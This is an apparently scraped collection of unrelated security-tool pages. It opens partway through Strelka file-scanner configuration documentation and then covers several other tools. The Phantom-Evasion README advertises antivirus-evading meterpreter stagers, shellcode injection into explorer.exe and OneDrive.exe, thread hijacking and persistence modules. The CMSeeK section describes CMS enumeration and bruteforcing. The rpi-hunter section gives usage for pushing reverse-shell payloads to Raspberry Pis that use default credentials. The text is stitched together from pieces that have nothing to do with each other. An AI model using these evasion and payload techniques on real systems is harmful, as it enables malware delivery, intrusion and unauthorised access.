Below is a sample configuration that shows how RAR files can be positively matched against a YARA rule (rar_file) and a MIME type (application/x-rar), but only if they are not negatively matched against a filename (\.rar$). This configuration would cause ScanRar to only be assigned to RAR files that do not have the extension ".rar".
scanners:
  'ScanRar':
    - negative:
        filename: '\.rar$'
      positive:
        flavors:
          - 'application/x-rar'
          - 'rar_file'
      priority: 5
      options:
        limit: 1000
Each scanner supports multiple mappings -- this makes it possible to assign different priorities and options to the scanner based on the mapping variables. If a scanner has multiple mappings that match a file, then the first mapping wins.
Below is a sample configuration that shows how a single scanner can apply different options depending on the mapping.
scanners:
  'ScanX509':
    - positive:
        flavors:
          - 'x509_der_file'
      priority: 5
      options:
        type: 'der'
    - positive:
        flavors:
          - 'x509_pem_file'
      priority: 5
      options:
        type: 'pem'
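
To make the assignment rules above concrete, here is a minimal Python sketch of the described matching logic (negative matches are checked first, any positive match assigns the scanner, and the first matching mapping wins); the data structures are illustrative, not Strelka's internal code:

import re

def section_matches(section, flavors, filename, source):
    # Flavor entries are literal strings; filename and source are regular expressions.
    if any(f in flavors for f in section.get("flavors", [])):
        return True
    if "filename" in section and re.search(section["filename"], filename):
        return True
    if "source" in section and re.search(section["source"], source):
        return True
    return False

def assign_scanner(mappings, flavors, filename, source):
    for mapping in mappings:
        negative = mapping.get("negative", {})
        if negative and section_matches(negative, flavors, filename, source):
            continue   # a negative match prevents assignment through this mapping
        positive = mapping.get("positive", {})
        if positive and section_matches(positive, flavors, filename, source):
            return mapping   # first matching mapping wins
    return None

scan_rar = [{"negative": {"filename": r"\.rar$"},
             "positive": {"flavors": ["application/x-rar", "rar_file"]},
             "priority": 5, "options": {"limit": 1000}}]
print(assign_scanner(scan_rar, ["rar_file"], "sample.bin", "smtp") is not None)  # True
print(assign_scanner(scan_rar, ["rar_file"], "sample.rar", "smtp") is not None)  # False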

Python Logging Configuration (strelka.py)
strelka.py uses an ini file (etc/strelka/pylogging.ini) to manage cluster-level statistics and information output by the Python logger. By default, this configuration file will log data to stdout and disable logging for packages imported by scanners.

DirStream Configuration (strelka_dirstream.py)
Strelka's dirstream configuration file is stored in etc/dirstream/dirstream.yml and contains two sub-sections: processes and workers.
The "processes" section controls the processes launched by the utility. The configuration options are:
  • "shutdown_timeout": amount of time (in seconds) that will elapse before the utility forcibly kills child processes after they have received a shutdown command (defaults to 10 seconds)
The "workers" section controls directory settings and network settings for each worker that sends files to the Strelka cluster. This section is a list; adding multiple directory/network settings makes it so multiple directories can be monitored at once. The configuration options are:
  • "directory": directory that files are sent from (defaults to None)
  • "source": application that writes files to the directory, used to control metadata parsing functionality (defaults to None)
  • "meta_separator": unique string used to separate pieces of metadata in a filename, used to parse metadata and send it along with the file to the cluster (defaults to "S^E^P")
  • "file_mtime_delta": delta (in seconds) that must pass since a file was last modified before it is sent to the cluster (defaults to 5 seconds)
  • "delete_files": boolean that determines if files should be deleted after they are sent to the cluster (defaults to False)
  • "broker": network address and network port of the broker (defaults to "127.0.0.1:5558")
  • "timeout": amount of time (in seconds) to wait for a file to be successfully sent to the broker (defaults to 10)
  • "use_green": boolean that determines if PyZMQ green should be used (this can increase performance at the risk of message loss, defaults to True)
  • "broker_public_key": location of the broker Curve public key certificate (enables Curve encryption, must be used if the broker has Curve enabled)
  • "client_secret_key": location of the client Curve secret key certificate (enables Curve encryption, must be used if the broker has Curve enabled)
To enable Bro support, a Bro file extraction script must be run by the Bro application; Strelka's file extraction script is stored in etc/bro/extract-strelka.bro and includes variables that can be redefined at Bro runtime. These variables are:
  • "mime_table": table of strings (Bro source) mapped to a set of strings (Bro mime_type) -- this variable defines which file MIME types Bro extracts and is configurable based on the location Bro identified the file (e.g. extract application/x-dosexec files from SMTP, but not SMB or FTP)
  • "filename_re": regex pattern that can extract files based on Bro filename
  • "unknown_mime_source": set of strings (Bro source) that determines if files of an unknown MIME type should be extracted based on the location Bro identified the file (e.g. extract unknown files from SMTP, but not SMB or FTP)
  • "meta_separator": string used in extracted filenames to separate embedded Bro metadata -- this must match the equivalent value in etc/dirstream/dirstream.yml
  • "directory_count_interval": interval used to schedule how often the script checks the file count in the extraction directory
  • "directory_count_threshold": int that is used as a trigger to temporarily disable file extraction if the file count in the extraction directory reaches the threshold

Encryption and Authentication
Strelka has built-in, optional encryption and authentication for client connections provided by CurveZMQ.

CurveZMQ
CurveZMQ (Curve) is ZMQ's encryption and authentication protocol. Read more about it here.

Using Curve
Strelka uses Curve to encrypt and authenticate connections between clients and brokers. By default, Strelka's Curve support is set up to enable encryption but not authentication.
To enable Curve encryption, the broker must be loaded with a private key -- any clients connecting to the broker must have the broker's public key to successfully connect.
To enable Curve encryption and authentication, the broker must be loaded with a private key and a directory of client public keys -- any clients connecting to the broker must have the broker's public key and have their client key loaded on the broker to successfully connect.
The generate_curve_certificates.py utility can be used to create client and broker certificates.
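
Underneath, this is standard PyZMQ Curve configuration. A minimal client-side sketch (the certificate paths, socket type and broker endpoint are hypothetical; Strelka wires this up through its own configuration files):

import zmq
import zmq.auth

# Certificates such as those produced by generate_curve_certificates.py
broker_public, _ = zmq.auth.load_certificate("certs/broker.key")
client_public, client_secret = zmq.auth.load_certificate("certs/client.key_secret")

context = zmq.Context.instance()
socket = context.socket(zmq.DEALER)
socket.curve_publickey = client_public   # this client's public key
socket.curve_secretkey = client_secret   # this client's secret key
socket.curve_serverkey = broker_public   # the broker's public key enables encryption
socket.connect("tcp://127.0.0.1:5558")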

Clusters
The following are recommendations and considerations to keep in mind when deploying clusters.

General Recommendations
The following recommendations apply to all clusters:
  • Do not run workers on the same server as a broker
    • This puts the health of the entire cluster at risk if the server becomes over-utilized
  • Do not over-allocate workers to CPUs
    • 1 worker per CPU
  • Allocate at least 1GB RAM per worker
    • If workers do not have enough RAM, then there will be excessive memory errors
    • Big files (especially compressed files) require more RAM
    • In large clusters, diminishing returns begin above 4GB RAM per worker
  • Allocate as much RAM as reasonable to the broker
    • ZMQ messages are stored entirely in memory -- in large deployments with many clients, the broker may use a lot of RAM if the workers cannot keep up with the number of file tasks

Sizing Considerations
Multiple variables should be considered when determining the appropriate size for a cluster:
  • Number of file requests per second
  • Type of file requests
    • Remote file requests take longer to process than direct file requests
  • Diversity of files requested
    • Binary files take longer to scan than text files
  • Number of YARA rules deployed
    • Scanning a file with 50,000 rules takes longer than scanning a file with 50 rules
The best way to properly size a cluster is to start small, measure performance, and scale out as needed.

Docker Considerations
Below is a list of considerations to keep in mind when running a cluster with Docker containers:
  • Share volumes, not files, with the container
    • Strelka's workers will read configuration files and YARA rules files when they startup -- sharing volumes with the container ensures that updated copies of these files on the localhost are reflected accurately inside the container without needing to restart the container
  • Increase stop-timeout
    • By default, Docker will forcibly kill a container if it has not stopped after 10 seconds -- this value should be increased to greater than the shutdown_timeout value in etc/strelka/strelka.yml
  • Increase shm-size
    • By default, Docker limits a container's shm size to 64MB -- this can cause errors with Strelka scanners that utilize tempfile
  • Set logging options
    • By default, Docker has no log limit for logs output by a container

Management
Due to its distributed design, we recommend using container orchestration (e.g. Kubernetes) or configuration management/provisioning (e.g. Ansible, SaltStack, etc.) systems for managing clusters.


Phantom Evasion - Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)


Phantom-Evasion is an interactive antivirus evasion tool written in python, capable of generating (almost) FUD executables even with the most common 32 bit msfvenom payloads (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0, Phantom-Evasion also includes a post-exploitation section dedicated to persistence and auxiliary modules.

The following OSs officially support automatic setup:
  1. Kali Linux Rolling 2018.1+ (64 bit)
  2. Parrot Security (64 bit)
The following OSs are likely able to run Phantom Evasion through manual setup:
  1. Arch Linux (64 bit)
  2. BlackArch Linux (64 bit)
  3. Elementary (64 bit)
  4. Linux Mint (64 bit)
  5. Ubuntu 15.10+ (64 bit)
  6. Windows 7/8/10 (64 bit)

Contributors
Special thanks to:
phra https://github.com/phra
stefano118 https://github.com/stefano118

Getting Started
Simply git clone, or download and unzip, the Phantom-Evasion folder.

Kali Linux:
Automatic setup officially supported, open a terminal and execute phantom-evasion:
sudo python phantom-evasion.py 
or:
sudo chmod +x ./phantom-evasion.py

sudo ./phantom-evasion.py

Dependencies (only for manual setup)
  1. metasploit-framework
  2. mingw-w64 (cygwin on windows)
  3. gcc
  4. apktool
  5. strip
  6. wine (not necessary on windows)
  7. apksigner
  8. pyinstaller
Requires libc6-dev-i386 (Linux only)

WINDOWS PAYLOADS

Windows Shellcode Injection Modules (C)
Msfvenom windows payloads and custom shellcodes supported
(>) Randomized junkcode and windows antivirus evasion techniques
(>) Multibyte Xor encoders available (see Multibyte Xor encoders readme section)
(>) Decoy Processes Spawner available (see Decoy Process Spawner section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 35-60 seconds
  1. Windows Shellcode Injection VirtualAlloc: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API.
  2. Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical APIs are dynamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  3. Windows Shellcode Injection VirtualAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical APIs are dynamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.
  4. Windows Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using HeapAlloc,HeapCreate,CreateThread,WaitForSingleObject API.
  5. Windows Shellcode Injection HeapAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical APIs are dynamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  6. Windows Shellcode Injection HeapAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical APIs are dynamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.
  7. Windows Shellcode Injection Process inject: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86), explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API.
  8. Windows Shellcode Injection Process inject NoDirectCall LL/GPA: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86), explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical APIs are dynamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  9. Windows Shellcode Injection Process inject NoDirectCall GPA/GMH: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86), explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical APIs are dynamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.
  10. Windows Shellcode Injection Thread Hijack: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86), explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API.
  11. Windows Shellcode Injection Thread Hijack LL/GPA: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86), explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical APIs are dynamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  12. Windows Shellcode Injection Thread Hijack GPA/GMH: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86), explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical APIs are dynamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.

Windows Pure C meterpreter stager
Pure C polymorphic meterpreter stagers compatible with msfconsole and cobalt strike beacon.(reverse_tcp/reverse_http)
(>) Randomized junkcode and windows antivirus evasion techniques
(>) Phantom evasion decoy process spawner available (see phantom evasion decoy process spawner section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 35-60 seconds
  1. C meterpreter/reverse_TCP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual)
  2. C meterpreter/reverse_TCP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap)
  3. C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64), memory:Virtual, API loaded at runtime)
  4. C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap , API loaded at runtime)
  5. C meterpreter/reverse_HTTP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , memory:Virtual)
  6. C meterpreter/reverse_HTTP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , memory:Heap)
  7. C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , API loaded at runtime)
  8. C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , memory:Heap , API loaded at runtime)
  9. C meterpreter/reverse_HTTPS VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_https polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64), memory:Virtual)
  10. C meterpreter/reverse_HTTPS HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_https polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64), memory:Heap)
  11. C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_https polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64), API loaded at runtime)
  12. C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_https polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64), memory:Heap, API loaded at runtime)

Powershell / Wine-Pyinstaller modules
Powershell modules:
(>) Randomized junkcode and windows antivirus evasion techniques
(>) Decoy Process Spawner available (see phantom evasion decoy process spawner section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 35-60 seconds
  1. Windows Powershell/Cmd Oneliner Dropper: Require user-supplied Powershell/Cmd oneliner payload (example Empire oneliner payload). Generate Windows powershell/Cmd oneliner dropper written in c. Powershell/Cmd oneliner payload is executed using system() function.
  2. Windows Powershell Script Dropper: Both msfvenom and custom powershell payloads supported. (32 bit powershell payloads are not compatible with 64 bit powershell target and vice versa.) Generate Windows powershell script (.ps1) dropper written in c. Powershell script payload is executed using system() function (powershell -executionpolicy bypass -WindowStyle Hidden -Noexit -File "PathTops1script").
Wine-Pyinstaller modules:
(>) Randomized junkcode and windows antivirus evasion techniques
(>) Execution time range: 5-25 seconds
(>) Require python and pyinstaller installed in wine.
  1. Windows WinePyinstaller Python Meterpreter
Pure python meterpreter payload.
  2. WinePyinstaller Oneliner payload dropper
Pure python powershell/cmd oneliner dropper.
Powershell/cmd payload executed using os.system().

LINUX PAYLOADS

Linux Shellcode Injection Module (C)
Msfvenom linux payloads and custom shellcodes supported.
(>) Randomized junkcode and C antivirus evasion techniques
(>) Multibyte Xor encoders available (see Multibyte Xor encoders readme section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range: 20-45 seconds
  1. Linux Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using mmap and memcpy.
  2. Linux Bash Oneliner Dropper: Execute custom oneliner payload using system() function.

OSX PAYLOADS
  1. OSX 32bit multi-encoded:
Pure msfvenom multi-encoded OSX payloads.

ANDROID PAYLOADS
  1. Android Msfvenom Apk smali/baksmali:
(>) Fake loop injection
(>) Goto loop
Android msfvenom payloads modified and rebuilt with apktool (also capable of APK backdoor injection).

UNIVERSAL PAYLOADS
Generate executable compatible with the OSs used to run Phantom-Evasion.
  1. Universal Meterpreter increments-trick
  2. Universal Polymorphic Meterpreter
  3. Universal Polymorphic Oneliner dropper

POST-EXPLOITATION MODULES
  1. Windows Persistence RegCreateKeyExW Add Registry Key (C): This module generates executables which need to be uploaded to the target machine and executed, specifying as argument the full path of the file to add to startup.
  2. Windows Persistence REG Add Registry Key (CMD): This module generates persistence cmdline payloads (Add Registry Key via REG.exe).
  3. Windows Persistence Keep Process Alive: This module generates an executable which needs to be uploaded to the target machine and executed. It uses CreateToolhelp32Snapshot, Process32First and Process32Next to check if the specified process is alive every X seconds. Useful combined with Persistence N.1 or N.2 (persistence starts the Keep Process Alive file, which then starts and keeps alive the specified process).
  4. Windows Persistence Schtasks cmdline
This module generates persistence cmdline payloads (using Schtasks.exe).
  5. Windows Set Files Attribute Hidden
Hide files through the command line or with a compiled executable (SetFileAttributes API).

Warning
PYTHON3 COMPATIBILITY TEMPORARILY SUSPENDED!

Decoy Processes Spawner:
During target-side execution this spawns (using the WinExec or CreateProcess API) a maximum of 4 processes sequentially. The last spawned process reaches the malicious section of code, while the decoy processes spawned before it execute only random junk code; a sketch of the idea follows.
PRO: longer execution time, lower detection rate. CON: higher resource consumption.
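A minimal sketch of that chain, under stated assumptions (the stage-counter argument, the junk-work loop and DECOY_COUNT are illustrative choices, not Phantom-Evasion's actual mechanism): each copy re-launches itself with an incremented stage number via WinExec, and only the last copy in the chain reaches the payload section.

/* Decoy chain sketch: copies 0..DECOY_COUNT-1 only burn time and respawn,
 * the final copy runs the "real" code. Illustration only. */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define DECOY_COUNT 4   /* hypothetical number of decoy stages */

static void junk_work(void)
{
    volatile unsigned long x = 0;
    for (unsigned long i = 0; i < 5000000UL; i++)
        x += i ^ (i << 3);              /* meaningless work for the decoys */
}

int main(int argc, char **argv)
{
    int stage = (argc > 1) ? atoi(argv[1]) : 0;

    if (stage < DECOY_COUNT) {
        char cmd[MAX_PATH + 16];
        junk_work();
        /* respawn ourselves with the next stage number */
        snprintf(cmd, sizeof(cmd), "\"%s\" %d", argv[0], stage + 1);
        WinExec(cmd, SW_HIDE);
        return 0;
    }

    puts("final process: the payload section would run here");
    return 0;
}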

Multibyte Xor Encoder:
C XOR encoders with three pure C decoding stubs, available with the Shellcode Injection modules. A sketch of the basic scheme follows the list.
  1. MultibyteKey xor:
Shellcode XORed with one multibyte (variable length) random key. Polymorphic C decoder stub.
  2. Double Multibyte-key xor:
Shellcode XORed with the result of the XOR between two multibyte (variable length) random keys. Polymorphic C decoder stub.
  3. Triple Multibyte-key xor:
Shellcode XORed with the result of the XOR between two multibyte (variable length) random keys, itself XORed with a third multibyte random key. Polymorphic C decoder stub.
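The single-key variant reduces to a repeating-key XOR, as in this small sketch (an assumption based on the description above, not the generated polymorphic stub): each byte is XORed with key[i % keylen], and because XOR is symmetric the same routine both encodes and decodes.

/* Repeating multibyte-key XOR: run once to encode, run again to decode. */
#include <stdio.h>
#include <stddef.h>

static void xor_multibyte(unsigned char *buf, size_t len,
                          const unsigned char *key, size_t keylen)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % keylen];      /* symmetric transformation */
}

int main(void)
{
    unsigned char data[] = { 0x90, 0x90, 0xc3 };          /* placeholder bytes */
    const unsigned char key[] = { 0x1f, 0xa2, 0x5b, 0x07 };

    xor_multibyte(data, sizeof(data), key, sizeof(key));  /* encode */
    xor_multibyte(data, sizeof(data), key, sizeof(key));  /* decode */

    for (size_t i = 0; i < sizeof(data); i++)
        printf("%02x ", data[i]);
    putchar('\n');
    return 0;
}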


Faraday v3.6 - Collaborative Penetration Test and Vulnerability Management Platform


Here are the main new features and improvements in Faraday v3.6:

Welcome ServiceNow
A new way to send vulnerabilities is available! We integrated Faraday with ServiceNow, giving you more options to work with.



The Burp plugin was totally revamped
We have been working hard to make several changes to enhance your daily workflow:


  • The Burp plugin now uses the Faraday server API, so you don't have to use the GTK client
  • The plugin was rewritten in Java
  • We added 2FA support to increase security

We empowered Jira integration 
Can you imagine sending multiple vulns to Jira without filling out the form every time? With Faraday v3.6, now you can!

With this integration, you don't have to enter your Jira credentials every time you use it; just do it once and you're ready to go. You also have the option to override the default settings and switch projects or usernames.

Jira is one of our most important integrations and we want to help you to get the most out of it.



Learn more about your vulns to mitigate them better

In this new version, we added more fields to enrich the Vulnerability Templates, hopefully improving an important part of your daily workflow. This new feature allows you to have all the data you need in one place.

Added fields:
  • impact
  • easeofresolution
  • policyviolations

Other plugins updated in this version
  • Netsparkers
  • SQLMap
  • Dnsmap
  • SSLyze 
  • Nessus 
  • Goohost


CMSeeK v1.1.1 - CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 150 Other CMSs)


What is a CMS?
A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some notable examples are WordPress, Joomla and Drupal.

Release History
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
...
Changelog File

Functions Of CMSeek:
  • Basic CMS Detection of over 155 CMS
  • Drupal version detection
  • Advanced Wordpress Scans
    • Detects Version
    • User Enumeration
    • Plugins Enumeration
    • Theme Enumeration
    • Detects Users (3 Detection Methods)
    • Looks for Version Vulnerabilities and much more!
  • Advanced Joomla Scans
    • Version detection
    • Backup files finder
    • Admin page finder
    • Core vulnerability detection
    • Directory listing check
    • Config leak detection
    • Various other checks
  • Modular bruteforce system
    • Use pre-made bruteforce modules or create your own and integrate them with it

Requirements and Compatibility:
CMSeeK is built using python3; you will need python3 to run this tool, and it is compatible with Unix-based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-updates, so make sure git is installed.

Installation and Usage:
It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:
  • git clone https://github.com/Tuhinshubhra/CMSeeK
  • cd CMSeeK
  • pip/pip3 install -r requirements.txt
For guided scanning:
  • python3 cmseek.py
Else:
  • python3 cmseek.py -u <target_url> [...]
Help menu from the program:
USAGE:
python3 cmseek.py (for a guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>

SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, -list LIST path of the file containing list of sites
for multi-site scan (comma separated)
RE-DIRECT:
--follow-redirect Follows all/any redirect(s)
--no-redirect Skips all redirects and tests the input target(s)

USER AGENT:
-r, --random-agent Use a random user agent
--googlebot Use Google bot user agent
--user-agent USER_AGENT Specify a custom user agent

OUTPUT:
-v, --verbose Increase output verbosity

VERSION & UPDATING:
--update Update CMSeeK (Requires git)
--version Show CMSeeK version and exit

HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result

EXAMPLE USAGE:
python3 cmseek.py -u example.com # Scan example.com
python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using a custom user agent (Mozilla 5.0 is used here)
python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com

Checking For Update:
You can check for updates either from the main menu or by running python3 cmseek.py --update, which checks for and applies updates automatically.
P.S.: Please make sure you have git installed; CMSeeK uses git to apply auto updates.

Detection Methods:
CMSeeK detects a CMS via the following signals (a small sketch follows the list):
  • HTTP Headers
  • Generator meta tag
  • Page source code
  • robots.txt
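To illustrate one of these signals, here is a standalone sketch; note that CMSeeK itself is written in python3, so this C/libcurl example only shows the idea of checking the generator meta tag, not the tool's own code (build with something like gcc detect_generator.c -lcurl).

/* Fetch a page and do a crude check for a "generator" meta tag. */
#include <curl/curl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct buf { char *data; size_t len; };

static size_t on_body(char *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct buf *b = userdata;
    size_t n = size * nmemb;
    char *p = realloc(b->data, b->len + n + 1);
    if (!p) return 0;                       /* abort transfer on OOM */
    b->data = p;
    memcpy(b->data + b->len, ptr, n);
    b->len += n;
    b->data[b->len] = '\0';
    return n;
}

int main(int argc, char **argv)
{
    struct buf body = { NULL, 0 };
    CURL *curl;

    if (argc < 2) { fprintf(stderr, "usage: %s <url>\n", argv[0]); return 1; }

    curl = curl_easy_init();
    if (!curl) return 1;
    curl_easy_setopt(curl, CURLOPT_URL, argv[1]);
    curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, on_body);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &body);
    if (curl_easy_perform(curl) == CURLE_OK && body.data) {
        /* crude signal only: a generator meta tag usually names the CMS */
        if (strstr(body.data, "name=\"generator\""))
            puts("generator meta tag found -- inspect its content attribute");
        else
            puts("no generator meta tag; fall back to headers/robots.txt");
    }
    curl_easy_cleanup(curl);
    free(body.data);
    return 0;
}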

Supported CMSs:
CMSeeK can currently detect 157 CMSs. Check the list in the cmss.py file, which is present in the cmseekdb directory. All the CMSs are stored in the following way:
cmsID = {
    'name': 'Name Of CMS',
    'url': 'Official URL of the CMS',
    'vd': 'Version Detection (0 for no, 1 for yes)',
    'deeps': 'Deep Scan (0 for no, 1 for yes)'
}

Scan Result:
All of your scan results are stored in a JSON file named cms.json; you can find the logs inside the Result\<Target Site> directory. As for the bruteforce results, they are stored in a txt file under the site's result directory as well.
Here is an example of the json report log:


Bruteforce Modules:
CMSeeK has a modular bruteforce system, meaning you can add your own custom bruteforce modules to work with CMSeeK. Proper documentation for creating modules will be created shortly, but in case you have already figured it out (pretty easy once you analyze the pre-made modules), all you need to do is this:
  1. Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This helps CMSeeK identify the name of the CMS using regex
  2. Add another comment ### cmseekbruteforcemodule; this helps CMSeeK know it is a module
  3. Copy and paste the module into the brutecms directory under CMSeeK's directory
  4. Open CMSeeK and rebuild the cache using U as the input in the first menu
  5. If everything is done right you'll see something like this (refer to the screenshot below) and your module will be listed in the bruteforce menu the next time you open CMSeeK.


Need More Reasons To Use CMSeeK?
If nothing else, you can always enjoy exiting CMSeeK (please don't); it will bid you goodbye with a random goodbye message in various languages.
You can also try reading the comments in the code; they are pretty random and weird!

Screenshots:

Main Menu


Scan Result

WordPress Scan Result

Guidelines for opening an issue:
Please make sure you have the following info attached when opening a new issue:
  • Target
  • Exact copy of error or screenshot of error
  • Your operating system and python version
Issues without this information might not be answered!

Follow @r3dhax0r:
Twitter

Team:
Team : Virtually Unvoid Defensive (VUD)


Rpi-Hunter - Automate Discovering And Dropping Payloads On LAN Raspberry Pi's Via SSH


Automate discovering and dropping payloads on LAN Raspberry Pi's via ssh.


rpi-hunter is useful when there are multiple Raspberry Pis on your LAN with default or known credentials; it automates sending commands/payloads to them over SSH.

GUIDE:

Installation
  1. Install dependencies: sudo pip install -U argparse termcolor and sudo apt -y install arp-scan tshark sshpass
  2. Download rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
  3. Navigate to rpi-hunter: cd ./rpi-hunter
  4. Make rpi-hunter.py executable: chmod +x rpi-hunter.py
  • One line variant: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

Usage
usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST]
[-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT]
[--safe] [-q]

optional arguments:
-h, --help show this help message and exit
--list List available payloads
--no-scan Disable ARP scanning
-r IP_RANGE IP range to scan
-f IP_LIST IP list to use (Default ./scan/RPI_list)
-u UNAME Username to use when ssh'ing
-c CREDS Password to use when ssh'ing
--payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or 'whoami']
-H HOST (If using reverse_shell payload) Host for reverse shell
-P PORT (If using reverse_shell payload) Port for reverse shell
--safe Print sshpass command, but don't execute it
-q Don't print banner
